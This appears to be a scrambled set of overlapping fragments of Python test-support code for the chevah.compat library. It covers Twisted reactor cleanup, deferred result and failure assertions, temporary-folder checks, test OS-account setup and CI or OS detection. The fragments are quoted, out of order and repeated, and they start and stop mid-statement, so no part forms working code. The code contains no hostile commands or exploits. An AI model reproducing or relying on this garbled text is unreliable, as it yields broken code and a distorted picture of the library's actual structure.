isinstance(deferred.result, Failure): error = deferred.result self.ignoreFailure(deferred) raise AssertionError(", "is auto cleaned. \"\"\" segments = mk.fs.createFileInTemp(prefix=prefix, suffix=suffix) path =", "success = None for i in range(2, 6): try: success", "from chevah.compat.testing.assertion import AssertionMixin from chevah.compat.testing.mockup import mk from chevah.compat.testing.constant", "restore them. reactor.addSystemEventTrigger( 'during', 'startup', reactor._reallyStartRunning) def _assertReactorIsClean(self): \"\"\" Check", "def setUpTestUser(cls): \"\"\" Add `CREATE_TEST_USER` to local OS. \"\"\" os_administration.addUser(cls.CREATE_TEST_USER)", "threads queue and active thread. if len(reactor.threadCallQueue) > 0: have_callbacks", "active thread. if len(reactor.threadCallQueue) > 0: have_callbacks = True continue", "the reactor until no more delayed calls are scheduled. This", "This means that neither L{Deferred.callback<twisted.internet.defer.Deferred.callback>} nor L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called,", "of members which were removed. \"\"\" if not mk.fs.exists(folder_segments): return", "= [] for delayed_call in reactor.getDelayedCalls(): try: delayed_call.cancel() except (ValueError,", "folders are present. \"\"\" # FIXME:922: # Move all filesystem", "and writers from the reactor. This is only for cleanup", "\"\"\" Called when start using stacked cleanups. \"\"\" self._cleanup_stack.append(self.__cleanup__) self.__cleanup__", "The failure result of C{deferred}. @rtype: L{failure.Failure} \"\"\" # FIXME:1370:", "no result or has a failure result. @return: The result", "empty when threadpool does not exists or has no job.", "case for all file-system tests using a real OS account.", "Return maximum memory usage in kilo bytes. \"\"\" if cls.os_family", "@param deferred: A L{Deferred<twisted.internet.defer.Deferred>} which has a failure result. This", "result = local_wmi.query(query.encode('utf-8')) peak_working_set_size = int(result[0].PeakWorkingSetSize) # FIXME:2099: # Windows", "def assertNoResult(self, deferred): \"\"\" Assert that C{deferred} does not have", "first_elements = sorted(first) second_elements = sorted(second) self.assertSequenceEqual(first_elements, second_elements, msg, list)", "twisted.internet.defer import Deferred from twisted.internet.posixbase import ( _SocketWaker, _UnixWaker, _SIGCHLDWaker", "process_capabilities.cpu_type ci_name = _get_ci_name() CI = _CI_NAMES TEST_LANGUAGE = os.getenv('TEST_LANG',", "the import as it will call lsb_release. import ld distro_name", "os.environ: os.environ['USER'] = os.environ['LOGNAME'] if 'USER' in os.environ and 'USERNAME'", "should only be called at teardown. \"\"\" if reactor is", "self._cleanup_stack.append(self.__cleanup__) self.__cleanup__ = [] def exitCleanup(self): \"\"\" To be called", "= self.getDeferredFailure(deferred) self.assertFailureType(AuthenticationError, failure) \"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop,", "account present. \"\"\" #: User will be created before running", "mk.fs.deleteFolder( self.test_segments, recursive=True) else: mk.fs.deleteFile(self.test_segments) checks = [ self.assertTempIsClean, self.assertWorkingFolderIsClean,", "else: return reactor.threadpool.working @classmethod def _cleanReactor(cls): \"\"\" Remove all delayed", "mk.makeFilesystemOSAvatar( name=cls.os_user.name, home_folder_path=home_folder_path, token=cls.os_user.token, ) cls.filesystem = LocalFilesystem(avatar=cls.avatar) @classmethod def", "created before running the test case and removed on #:", "test case and removed on #: teardown. CREATE_TEST_USER = None", "in first_keys] second_values = [second[key] for key in second_keys] self.assertSequenceEqual(first_keys,", "= [] EXCEPTED_READERS = [ _UnixWaker, _SocketWaker, _SIGCHLDWaker, ] #", "only run the reactor once. This is useful if you", "look for other delayed calls. have_callbacks = True break #", "def tempPathCleanup(self, prefix='', suffix=''): \"\"\" Return (path, segments) for a", "= system_users.getHomeFolder( username=cls.os_user.name, token=cls.os_user.token) cls.avatar = mk.makeFilesystemOSAvatar( name=cls.os_user.name, home_folder_path=home_folder_path, token=cls.os_user.token,", "%s\\n' u'writers: %s\\n' u'readers: %s\\n' u'threadpool size: %s\\n' u'threadpool threads:", "= [] self.test_segments = None def tearDown(self): self.callCleanup() self._checkTemporaryFiles() threads", "delayed.func: # Was already called. continue delayed_str = self._getDelayedCallName(delayed) is_exception", "a failure. \"\"\" if not isinstance(deferred.result, Failure): raise AssertionError('Deferred is", "tearDown(self): self.callCleanup() self._checkTemporaryFiles() threads = threading.enumerate() if len(threads) > 1:", "case.''' success_state = None # We search starting with second", "partial thread names to ignore during the tearDown. # No", "\"\"\" Assert that C{deferred} does not have a result at", "return the failure. Usage:: checker = mk.credentialsChecker() credentials = mk.credentials()", "if reactor._started: # noqa:cover # Reactor was not stopped, so", "(2, 7): from unittest2 import TestCase # Shut up you", "msg, list) def _baseAssertEqual(self, first, second, msg=None): \"\"\" Update to", "required to initiate a reactor for testing. \"\"\" self._timeout_reached =", "be raised at reactor shutdown for not being handled. \"\"\"", "deferred is handled by this method, to avoid propagating the", "is customized for Chevah Nose runner. This is only called", "return res deferred.addBoth(cb) if result: # If there is already", "should save a few DNS queries. hostname = _get_hostname() Bunch", "like to use one of the `getDeferredFailure` or `getDeferredResult`. Usage::", "and isinstance(second, text_type) ): # noqa:cover if not msg: msg", "msg: msg = u'First is unicode while second is str", "has consumed the startup events, so we need # to", "to Twisted 13 result = [] deferred.addBoth(result.append) if not result:", "the current failure on the deferred. It transforms an failure", "main thread: %s - %s' % ( thread_name, threads))) super(ChevahTestCase,", "tests that need a dedicated local OS account present. \"\"\"", "assertNoResult(self, deferred): \"\"\" Assert that C{deferred} does not have a", "Return (path, segments) for a new file created in temp", "is handled by this method, to avoid propagating the error", "success = None if success is None: raise AssertionError('Failed to", "not created yet. \"\"\" return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix) def tempPathCleanup(self, prefix='',", "only at the end of test. Only use this for", "self.__cleanup__ = self._cleanup_stack.pop() @contextlib.contextmanager def stackedCleanup(self): \"\"\" Context manager for", "default DNS resolver. \"\"\" return socket.gethostname() class TwistedTestCase(TestCase): \"\"\" Test", "execute.' % timeout) self._reactor_timeout_failure = failure def _initiateTestReactor(self, timeout): \"\"\"", "have_callbacks = True continue self._shutdownTestReactor() def executeDelayedCalls(self, timeout=None, debug=False): \"\"\"", "still active threads, ' 'beside the main thread: %s -", "be stopped. \"\"\" if not self._timeout_reached: # Everything fine, disable", "self).assertSequenceEqual( first, second, msg, seq_type) for first_element, second_element in zip(first,", "not self._timeout_reached: # Everything fine, disable timeout. if ( self._reactor_timeout_call", "suite should be started as root and we drop effective", "= '-' def setUp(self): super(ChevahTestCase, self).setUp() self.__cleanup__ = [] self._cleanup_stack", "with super_assertRaises(exception_class) as context: callback(*args, **kwargs) return context.exception def assertSequenceEqual(self,", "deferred): \"\"\" Check that deferred is a failure. \"\"\" if", "we drop effective user # privileges. system_users.dropPrivileges(username=cls._drop_user) @staticmethod def skipTest(message=''):", "stack and we don't care about it. for level in", "running threads tests the reactor touched from the test #", "success result (%r) instead\" % (deferred, result[0])) elif (expectedExceptionTypes and", "stackedCleanup(self): \"\"\" Context manager for stacked cleanups. \"\"\" try: self.enterCleanup()", "\"\"\" Call all cleanup methods. If a cleanup fails, the", "else: raise AssertionError('OS not supported.') def folderInTemp(self, *args, **kwargs): \"\"\"", "cleanups will continue to be called and the first failure", "of C{deferred} is left unchanged. Otherwise, any L{failure.Failure} result is", "= mk.credentials() deferred = checker.requestAvatarId(credentials) self._runDeferred(deferred) self.assertIsNotFailure(deferred) self.assertEqual('something', deferred.result) \"\"\"", "reader_type in self.EXCEPTED_READERS: if isinstance(reader, reader_type): excepted = True break", "'threaded_reactor', 'GlobalPool-WorkerHandler', 'GlobalPool-TaskHandler', 'GlobalPool-ResultHandler', 'PoolThread-twisted.internet.reactor', ] # We assume that", "(location, reason)) if reactor._started: # noqa:cover # Reactor was not", "reactor.doIteration(0.000001) def _shutdownTestReactor(self, prevent_stop=False): \"\"\" Called at the end of", "and will not stop the reactor. \"\"\" if timeout is", "the assertion succeeds, then the result of C{deferred} is left", "which will be removed only at the end of test.", "the result. Usage:: checker = mk.credentialsChecker() credentials = mk.credentials() deferred", "if distro_name in ['centos', 'ol']: # Normalize all RHEL variants.", "not an instance of `expected_type` \"\"\" # In Python 2.7", "left over.\\n %s' % ( '\\n'.join(errors)))) def shortDescription(self): # noqa:cover", "member.find(TEST_NAME_MARKER) == -1: continue temp_members.append(member) segments = folder_segments[:] segments.append(member) if", "Test case for Chevah tests. Checks that temporary folder is", "[] while len(reactor.threadpool._team._pending): result.append(reactor.threadpool._team._pending.pop()) return result def _threadPoolThreads(self): \"\"\" Return", "last in case some other modules are changing the reactor.", "first,) raise AssertionError(msg.encode('utf-8')) return super(ChevahTestCase, self)._baseAssertEqual( first, second, msg=msg) @staticmethod", "expected on %r, \" \"found type %r instead: %s\" %", "our own timeout call. if delayed is self._reactor_timeout_call: continue if", "( TEST_NAME_MARKER, ) from chevah.compat.testing.filesystem import LocalTestFilesystem # For Python", "A L{Deferred<twisted.internet.defer.Deferred>} without a result. This means that neither L{Deferred.callback<twisted.internet.defer.Deferred.callback>}", "13 result = [] def cb(res): result.append(res) return res deferred.addBoth(cb)", "isinstance(result[0], Failure): self.fail( \"Failure result expected on %r, \" \"found", "during test and this # should save a few DNS", "from chevah.compat.testing import TEST_ACCOUNT_GROUP user = mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP) os_administration.addUser(user) return user", "if os.environ.get('GITHUB_ACTIONS', '').lower() == 'true': return _CI_NAMES.GITHUB if os.environ.get('TRAVIS', '').lower()", "None from chevah.compat import ( DefaultAvatar, LocalFilesystem, process_capabilities, system_users, SuperAvatar,", "deferred.result def assertWasCalled(self, deferred): \"\"\" Check that deferred was called.", "= None def setUp(self): super(TwistedTestCase, self).setUp() self._timeout_reached = False self._reactor_timeout_failure", "at threads queue. if len(reactor.threadCallQueue) > 0: raise_failure('queued threads', reactor.threadCallQueue)", "the deferred in the reactor loop. Starts the reactor, waits", "prevent_stop=prevent_stop, ) self.assertIsFailure(deferred) failure = deferred.result self.ignoreFailure(deferred) return failure def", "is changed from other source. pass reactor.threadCallQueue = [] for", "L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @param expectedExceptionTypes: Exception types to expect", "are currently executed. \"\"\" if os.environ.get('BUILDBOT', '').lower() == 'true': return", "Obsolete. Please use self.patch and self.patchObject. Patch = patch _environ_user", "wmi import WMI local_wmi = WMI('.') query = ( u'SELECT", "timeout=timeout, debug=debug) result = deferred.result def executeReactor(self, timeout=None, debug=False, run_once=False):", "threads are in the queues. Set run_once=True to only run", "len(reactor.threadCallQueue) > 0: raise_failure('queued threads', reactor.threadCallQueue) if reactor.threadpool and len(reactor.threadpool.working)", "None) self.fail( \"No result expected on %r, found %r instead\"", "if os_name != 'linux': return process_capabilities.os_name # We delay the", "not in os.environ: os.environ['USER'] = os.environ['LOGNAME'] if 'USER' in os.environ", "test files from temporary folder. Return a list of members", "reactor._started = False reactor._justStopped = False reactor.startRunning() def _iterateTestReactor(self, debug=False):", "value, msg=None): \"\"\" Raise an exception if `value` is not", "KeyError: success_state = None if success_state is None: raise AssertionError('Failed", "DefaultAvatar, LocalFilesystem, process_capabilities, system_users, SuperAvatar, ) from chevah.compat.administration import os_administration", "def tearDownClass(cls): if not cls.os_user.windows_create_local_profile: os_administration.deleteHomeFolder(cls.os_user) os_administration.deleteUser(cls.os_user) super(FileSystemTestCase, cls).tearDownClass() @classmethod", "case we are running the test suite as super user,", "no job. \"\"\" if not reactor.threadpool: return [] else: return", "False break if have_callbacks: break if have_callbacks: continue # Look", "( deferred,)) elif not isinstance(result[0], Failure): self.fail( \"Failure result expected", "= raw_name.replace('<function ', '') raw_name = raw_name.replace('<bound method ', '')", "isinstance(first, text_type) and isinstance(second, text_type) ): # noqa:cover if not", "failure result of C{deferred}. @rtype: L{failure.Failure} \"\"\" # FIXME:1370: #", "\"\"\" Wrapper around the stdlib call to allow non-context usage.", "if delayed_call.active(): delayed_str = self._getDelayedCallName(delayed_call) if delayed_str in self.EXCEPTED_DELAYED_CALLS: continue", "transport.value() self.assertStartsWith('211-Features:\\n', result) \"\"\" if timeout is None: timeout =", "for delayed_call in reactor.getDelayedCalls(): try: delayed_call.cancel() except (ValueError, AttributeError): #", "# See LICENSE for details. \"\"\" TestCase used for Chevah", "all test files from temporary folder. Return a list of", "this for very high level integration code, where you don't", "readers and writers from the reactor. This is only for", "and return its path and segments, which is auto cleaned.", "in %s.' % (repr(source), repr(target)) raise AssertionError(message.encode('utf-8')) def assertIsInstance(self, expected_type,", "None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) while not self._timeout_reached: self._iterateTestReactor(debug=debug) if", "def addCleanup(self, function, *args, **kwargs): \"\"\" Overwrite unit-test behaviour to", "It is not the marketing name. We only support the", "clean reactor. reactor._startedBefore = False reactor._started = False reactor._justStopped =", "noqa:cover self._teardown_errors.append(error) self.__cleanup__ = [] def enterCleanup(self): \"\"\" Called when", "the end of a stacked cleanup. \"\"\" self.callCleanup() self.__cleanup__ =", "cls._drop_user == '-': return os.environ['USERNAME'] = cls._drop_user os.environ['USER'] = cls._drop_user", "of the delayed call. \"\"\" raw_name = text_type(delayed_call.func) raw_name =", "cleanup=self.addCleanup, prefix=prefix, suffix=suffix) def tempFile(self, content='', prefix='', suffix='', cleanup=True): \"\"\"", "Run the reactor until no more delayed calls are scheduled.", "_CI_NAMES.AZURE if os.environ.get('CI', '').lower() == 'true': return _CI_NAMES.UNKNOWN return _CI_NAMES.LOCAL", "which is auto cleaned. \"\"\" segments = mk.fs.createFileInTemp(prefix=prefix, suffix=suffix) path", "delayed_calls.remove(self._reactor_timeout_call) except ValueError: # noqa:cover # Timeout might be no", "high level integration code, where you don't have the change", "exception wrapped by the failure result is not one of", "a folder in the default temp folder and mark it", "reactor._reallyStartRunning) def _assertReactorIsClean(self): \"\"\" Check that the reactor has no", "queue. if len(reactor.threadCallQueue) > 0: raise_failure('queued threads', reactor.threadCallQueue) if reactor.threadpool", "\"\"\" Return current Unix timestamp. \"\"\" return time.time() @classmethod def", "break except KeyError: success_state = None if success_state is None:", "%s.' % (repr(source), repr(target)) raise AssertionError(message.encode('utf-8')) def assertIsInstance(self, expected_type, value,", "def _runDeferred( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" This is", "reactor until no more delayed calls are scheduled. This will", "\"\"\" cls._drop_user = drop_user os.environ['DROP_USER'] = drop_user if 'LOGNAME' in", "second_elements = sorted(second) self.assertSequenceEqual(first_elements, second_elements, msg, list) def _baseAssertEqual(self, first,", "result expected on %r, \" \"found failure result instead:\\n%s\" %", "It transforms an failure into result `None` so that the", "tempPathCleanup(self, prefix='', suffix=''): \"\"\" Return (path, segments) for a path", "as we already know that we need # to wait", "Failure. The failed deferred is handled by this method, to", "if not delayed_calls: break self._shutdownTestReactor(prevent_stop=True) if self._reactor_timeout_failure is not None:", "= platform.processor() if base == 'aarch64': return 'arm64' if base", "if not mk.fs.exists(folder_segments): return [] # In case we are", "reactor._started = False reactor._justStopped = False reactor.running = False #", "len(threads) > 1: for thread in threads: thread_name = thread.getName()", "noqa:cover # Timeout might be no longer be there. pass", "None @property def _caller_success_member(self): \"\"\" Retrieve the 'success' member from", "Failure): self.fail( \"Failure result expected on %r, \" \"found success", "_caller_success_member(self): '''Retrieve the 'success' member from the test case.''' success_state", "cls._cleanFolder(mk.fs.temp_segments) @classmethod def cleanWorkingFolder(cls): path = mk.fs.getAbsoluteRealPath('.') segments = mk.fs.getSegmentsFromRealPath(path)", "len(reactor.getWriters()) > 0: have_callbacks = True continue for reader in", "return \"%s - %s.%s\" % ( self._testMethodName, class_name, self._testMethodName) def", "True if not is_exception: # No need to look for", "mk.credentials() deferred = checker.requestAvatarId(credentials) result = self.getDeferredResult(deferred) self.assertEqual('something', result) \"\"\"", "Bunch( LOCAL='local', GITHUB='github-actions', TRAVIS='travis', BUILDBOT='buildbot', UNKNOWN='unknown-ci', AZURE='azure-pipelines', ) def _get_ci_name():", "msg: msg = u'First is str while second is unicode", "wait at least for delayed calls. if have_callbacks: continue if", "not be used by normal tests. \"\"\" if not reactor:", "# noqa:cover # Reactor was not stopped, so stop it", "_environ_user = None _drop_user = '-' def setUp(self): super(ChevahTestCase, self).setUp()", "last callback or errback raised an exception or returned a", "a string representation of all delayed calls from reactor queue.", "all the tests, we run with a very small value.", "excepted = False for reader_type in self.EXCEPTED_READERS: if isinstance(reader, reader_type):", "os_name == 'aix': # noqa:cover return 'aix-%s.%s' % (platform.version(), platform.release())", "delayed in reactor.getDelayedCalls(): # We skip our own timeout call.", "os.environ.get('TRAVIS', '').lower() == 'true': return _CI_NAMES.TRAVIS if os.environ.get('INFRASTRUCTURE', '') ==", "while second is unicode for \"%s\".' % ( first,) raise", "empty list when threadpool does not exists. \"\"\" if not", "# removeAll might fail since it detects that internal state", "separate thread. # AttributeError can occur when we do multi-threading.", "return the result. Usage:: checker = mk.credentialsChecker() credentials = mk.credentials()", "is clean at exit. \"\"\" os_name = process_capabilities.os_name os_family =", "finally: self._cleanReactor() super(TwistedTestCase, self).tearDown() def _reactorQueueToString(self): \"\"\" Return a string", "used by normal tests. \"\"\" if not reactor: return try:", "[] for delayed in reactor.getDelayedCalls(): # noqa:cover result.append(text_type(delayed.func)) return '\\n'.join(result)", "Set up timeout. self._reactor_timeout_call = reactor.callLater( timeout, self._raiseReactorTimeoutError, timeout) #", "to initiate a reactor for testing. \"\"\" self._timeout_reached = False", "variants. distro_name = 'rhel' distro_version = ld.version().split('.', 1)[0] return '%s-%s'", "def assertIn(self, target, source): \"\"\" Overwrite stdlib to swap the", "cls.filesystem = LocalFilesystem(avatar=cls.avatar) @classmethod def tearDownClass(cls): if not cls.os_user.windows_create_local_profile: os_administration.deleteHomeFolder(cls.os_user)", "to only run the reactor once. This is useful if", "[] result = [] while len(reactor.threadpool._team._pending): result.append(reactor.threadpool._team._pending.pop()) return result def", "FIXME:1370: # Remove / re-route this code after upgrading to", "def assertIsNotFailure(self, deferred): \"\"\" Raise assertion error if deferred is", "Failure): error = deferred.result self.ignoreFailure(deferred) raise AssertionError( 'Deferred contains a", "much better debug output. # Otherwise the debug messages will", "process_capabilities.os_name os_family = process_capabilities.os_family os_version = _get_os_version() cpu_type = process_capabilities.cpu_type", "this code after upgrading to Twisted 13 result = []", "the version. On Windows it is the `nt` followed by", "the 'success' member from the test case.''' success_state = None", "\"\"\" if not isinstance(deferred.result, Failure): raise AssertionError('Deferred is not a", "that internal state # is changed from other source. pass", "self._timeout_reached = True failure = AssertionError( 'Reactor took more than", "\"\"\" if source not in target: message = u'%s not", "6): try: success = inspect.stack()[i][0].f_locals['success'] break except KeyError: success =", "in checks: try: check() except AssertionError as error: errors.append(error.message) if", "reactor = None def _get_hostname(): \"\"\" Return hostname as resolved", "return int(peak_working_set_size) else: raise AssertionError('OS not supported.') def folderInTemp(self, *args,", "continue if run_once: if have_callbacks: raise AssertionError( 'Reactor queue still", "writers. This should only be called at teardown. \"\"\" if", "before tearDown. \"\"\" self.__cleanup__.append((function, args, kwargs)) def callCleanup(self): \"\"\" Call", "it at the end. \"\"\" iterations = [False] * (count", "cls.os_user.windows_create_local_profile: os_administration.deleteHomeFolder(cls.os_user) os_administration.deleteUser(cls.os_user) super(FileSystemTestCase, cls).tearDownClass() @classmethod def setUpTestUser(cls): \"\"\" Set-up", "the reactor will not be stopped. \"\"\" if not self._timeout_reached:", "self.__cleanup__ = [] def enterCleanup(self): \"\"\" Called when start using", "SuperAvatar() else: temp_avatar = DefaultAvatar() temp_filesystem = LocalFilesystem(avatar=temp_avatar) temp_members =", "# FIXME:2099: # Windows XP reports value in bytes, instead", "reactor.getReaders(): excepted = False for reader_type in self.EXCEPTED_READERS: if isinstance(reader,", "%d to execute.' % timeout) # Check executing all deferred", "EXCEPTED_DELAYED_CALLS = [] EXCEPTED_READERS = [ _UnixWaker, _SocketWaker, _SIGCHLDWaker, ]", "'solaris-%s' % (parts[1],) if os_name == 'aix': # noqa:cover return", "TRAVIS='travis', BUILDBOT='buildbot', UNKNOWN='unknown-ci', AZURE='azure-pipelines', ) def _get_ci_name(): \"\"\" Return the", "\"\"\" Raise an exception if `value` is not an instance", "is not created yet. \"\"\" return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix) def tempPathCleanup(self,", "msg)) def tempPath(self, prefix='', suffix=''): \"\"\" Return (path, segments) for", "we can not find the home folder path. if not", "excepted_reader in self.EXCEPTED_READERS: if isinstance(reader, excepted_reader): have_callbacks = False break", "second, msg=msg) @staticmethod def getHostname(): \"\"\" Return the hostname of", "have_callbacks = True continue if reactor.threadpool and len(reactor.threadpool.working) > 0:", "reactor.runUntilCurrent() if debug: # noqa:cover # When debug is enabled", "if timeout is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) while not", "clean the home folder. test_filesystem = LocalTestFilesystem(avatar=self.avatar) test_filesystem.cleanHomeFolder() class OSAccountFileSystemTestCase(FileSystemTestCase):", "% timeout) # Check executing all deferred from chained callbacks.", "user, # we use super filesystem for cleaning. if cls._environ_user", "removes elements from the Twisted thread queue, which will never", "The failed deferred is handled by this method, to avoid", "reader in reactor.getReaders(): have_callbacks = True for excepted_reader in self.EXCEPTED_READERS:", "% ( expectedString, deferred, result[0].type, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return", "second_elements, msg, list) def _baseAssertEqual(self, first, second, msg=None): \"\"\" Update", "import AssertionMixin from chevah.compat.testing.mockup import mk from chevah.compat.testing.constant import (", "raw_name.replace('<function ', '') raw_name = raw_name.replace('<bound method ', '') return", "self.test_segments: if mk.fs.isFolder(self.test_segments): mk.fs.deleteFolder( self.test_segments, recursive=True) else: mk.fs.deleteFile(self.test_segments) checks =", "if not reactor.threadpool: return [] else: return reactor.threadpool.working @classmethod def", "# case itself which run in one tread and from", "not exists. \"\"\" if not reactor.threadpool: return [] else: return", "one tread and from the fixtures/cleanup # code which is", "test # passed. self.assertIsNone(self._reactor_timeout_failure) self._assertReactorIsClean() finally: self._cleanReactor() super(TwistedTestCase, self).tearDown() def", "def setUpClass(cls): # FIXME:924: # Disabled when we can not", "to execute.' % timeout) self._reactor_timeout_failure = failure def _initiateTestReactor(self, timeout):", "need # to restore them. reactor.addSystemEventTrigger( 'during', 'startup', reactor._reallyStartRunning) def", "does not have a result at this point. If the", "@return: The failure result of C{deferred}. @rtype: L{failure.Failure} \"\"\" #", "from chevah.compat import ( DefaultAvatar, LocalFilesystem, process_capabilities, system_users, SuperAvatar, )", "# Look at threads queue. if len(reactor.threadCallQueue) > 0: raise_failure('queued", "would like to use one of the `getDeferredFailure` or `getDeferredResult`.", "want to force to reactor to wake at an #", "return user def setUp(self): super(FileSystemTestCase, self).setUp() # Initialized only to", "cls.os_family == 'posix': import resource return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss elif cls.os_family ==", "= False reactor._started = False reactor._justStopped = False reactor.startRunning() def", "# noqa:cover # Timeout might be no longer be there.", "Initialized only to clean the home folder. test_filesystem = LocalTestFilesystem(avatar=self.avatar)", "in ['centos', 'ol']: # Normalize all RHEL variants. distro_name =", "can occur when we do multi-threading. pass def _raiseReactorTimeoutError(self, timeout):", "% (parts[1],) if os_name == 'aix': # noqa:cover return 'aix-%s.%s'", "for key in first_keys] second_values = [second[key] for key in", "working: %s\\n' u'\\n' % ( self._reactorQueueToString(), reactor.threadCallQueue, reactor.getWriters(), reactor.getReaders(), reactor.getThreadPool().q.qsize(),", "if result: # If there is already a failure, the", "# Copyright (c) 2011 <NAME>. # See LICENSE for details.", "first_keys] second_values = [second[key] for key in second_keys] self.assertSequenceEqual(first_keys, second_keys,", "AssertionError('Failed to find \"success\" attribute.') return success def tearDown(self): try:", "AssertionError('This is not a deferred.') if timeout is None: timeout", "in self.EXCEPTED_READERS: if isinstance(reader, excepted_reader): have_callbacks = False break if", "): # noqa:cover if not msg: msg = u'First is", "reactor.getThreadPool().q.qsize(), self._threadPoolThreads(), self._threadPoolWorking(), ) ) t2 = reactor.timeout() # For", "if os.environ.get('TRAVIS', '').lower() == 'true': return _CI_NAMES.TRAVIS if os.environ.get('INFRASTRUCTURE', '')", "%r, found no result instead\" % ( deferred,)) elif not", "reactor.getReaders(): have_callbacks = True for excepted_reader in self.EXCEPTED_READERS: if isinstance(reader,", "to use `getDeferredFailure` or `getDeferredResult`. Run the deferred in the", "(count - 1) iterations.append(True) self.executeReactorUntil( lambda _: iterations.pop(0), timeout=timeout, debug=debug)", "iterations.append(True) self.executeReactorUntil( lambda _: iterations.pop(0), timeout=timeout, debug=debug) def iterateReactorWithStop(self, count=1,", "error: errors.append(error.message) if errors: # noqa:cover self._teardown_errors.append(AssertionError( 'There are temporary", "should not be used by normal tests. \"\"\" if not", "Run the deferred in the reactor loop. Starts the reactor,", "own timeout call. if delayed is self._reactor_timeout_call: continue if not", "def initialize(cls, drop_user): \"\"\" Initialize the testing environment. \"\"\" cls._drop_user", "are ValueError. # Might be canceled from the separate thread.", "root and we drop effective user # privileges. system_users.dropPrivileges(username=cls._drop_user) @staticmethod", "debug messages will flood the output. print ( u'delayed: %s\\n'", "success result of C{deferred} or raise C{self.failException}. @param deferred: A", "handled by this method, to avoid propagating the error into", "we already know that we need # to wait at", "to Twisted 13 result = [] def cb(res): result.append(res) return", "= transport.value() self.assertStartsWith('211-Features:\\n', result) \"\"\" if timeout is None: timeout", "Remove / re-route this code after upgrading to Twisted 13.0.", "Set-up OS user for file system testing. \"\"\" from chevah.compat.testing", "not isinstance(result[0], Failure): self.fail( \"Failure result expected on %r, \"", "for \"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8')) return super(ChevahTestCase, self)._baseAssertEqual(", "reactor.getDelayedCalls(): try: delayed_call.cancel() except (ValueError, AttributeError): # AlreadyCancelled and AlreadyCalled", "excepted_callback in delayed_str: is_exception = True if not is_exception: #", "from six.moves import range import contextlib import inspect import threading", "if len(reactor.getWriters()) > 0: have_callbacks = True continue for reader", "\"Failure of type (%s) expected on %r, \" \"found type", "shortDescription(self): # noqa:cover \"\"\" The short description for the test.", "= [] deferred.addBoth(result.append) if not result: self.fail( \"Failure result expected", "_get_hostname() @classmethod def initialize(cls, drop_user): \"\"\" Initialize the testing environment.", "from folder_segments. Return a list of members which were removed.", "working thread from pool, or empty when threadpool does not", "unicode while second is str for \"%s\".' % ( first,)", "at delayed calls. for delayed in reactor.getDelayedCalls(): # We skip", "is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) # Set it to", "reactor._justStopped = False reactor.running = False # Start running has", "AssertionMixin): \"\"\" Test case for Chevah tests. Checks that temporary", "reactor.getDelayedCalls(): if delayed_call.active(): delayed_str = self._getDelayedCallName(delayed_call) if delayed_str in self.EXCEPTED_DELAYED_CALLS:", "type %r instead: %s\" % ( expectedString, deferred, result[0].type, result[0].getBriefTraceback().decode(", "for first_element, second_element in zip(first, second): self.assertEqual(first_element, second_element) def assertDictEqual(self,", "distro_version) def _get_cpu_type(): \"\"\" Return the CPU type as used", "error while executing the reactor. \"\"\" self._timeout_reached = True failure", "reactor._started: # noqa:cover # Reactor was not stopped, so stop", "self.executeReactorUntil( lambda _: time.time() - start > duration, timeout=duration +", "stopping it. \"\"\" iterations = [False] * (count - 1)", "try: delayed_call.cancel() except (ValueError, AttributeError): # AlreadyCancelled and AlreadyCalled are", "If the assertion succeeds, then the result of C{deferred} is", "def _cleanReactor(cls): \"\"\" Remove all delayed calls, readers and writers", "This can happen if we prevent stop in a previous", "% ( deferred, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0] def", "'GlobalPool-ResultHandler', 'PoolThread-twisted.internet.reactor', ] # We assume that hostname does not", "will flood the output. print ( u'delayed: %s\\n' u'threads: %s\\n'", "for not being handled. \"\"\" deferred.addErrback(lambda failure: None) def assertIsFailure(self,", "\"\"\" if os.name == 'nt': parts = platform.version().split('.') return 'nt-%s.%s'", "raise AssertionError( \"Expecting type %s, but got %s. %s\" %", "self._iterateTestReactor(debug=debug) if callable(reactor): break self._shutdownTestReactor(prevent_stop=prevent_stop) def iterateReactor(self, count=1, timeout=None, debug=False):", "_getDelayedCallName(self, delayed_call): \"\"\" Return a string representation of the delayed", "credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) result = self.getDeferredResult(deferred) self.assertEqual('something',", "# to have a much better debug output. # Otherwise", "def _get_cpu_type(): \"\"\" Return the CPU type as used in", "# noqa:cover result.append(text_type(delayed.func)) return '\\n'.join(result) def _threadPoolQueue(self): \"\"\" Return current", "@raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has no result, has a", "run_once=True to only run the reactor once. This is useful", "reactor. This is only for cleanup purpose and should not", "a path which is not created yet but which will", "== 'true': return _CI_NAMES.TRAVIS if os.environ.get('INFRASTRUCTURE', '') == 'AZUREPIPELINES': return", "Look at writers buffers: if len(reactor.getWriters()) > 0: have_callbacks =", "not stopped.') # Look at threads queue. if len(reactor.threadCallQueue) >", "script. \"\"\" base = platform.processor() if base == 'aarch64': return", "= self.addCleanup return mk.fs.fileInTemp(*args, **kwargs) def assertIn(self, target, source): \"\"\"", "# Check for a clean reactor at shutdown, only if", "is not a deferred.') if timeout is None: timeout =", "if run_once: if have_callbacks: raise AssertionError( 'Reactor queue still contains", "in thread pool. if reactor.threadpool: if ( reactor.threadpool.working or (reactor.threadpool.q.qsize()", "\"\"\" Return current threads from pool, or empty list when", "nor L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called, or that the L{Deferred<twisted.internet.defer.Deferred>} is", "% (self._reactorQueueToString())) break # Look at writers buffers: if len(reactor.getWriters())", "for a path which is not created yet. \"\"\" return", "raise AssertionError('This is not a deferred.') if timeout is None:", "success_state = None # We search starting with second stack,", "= deferred.result self.ignoreFailure(deferred) return failure def successResultOf(self, deferred): \"\"\" Return", "The short description for the test. bla.bla.tests. is removed. The", "in the 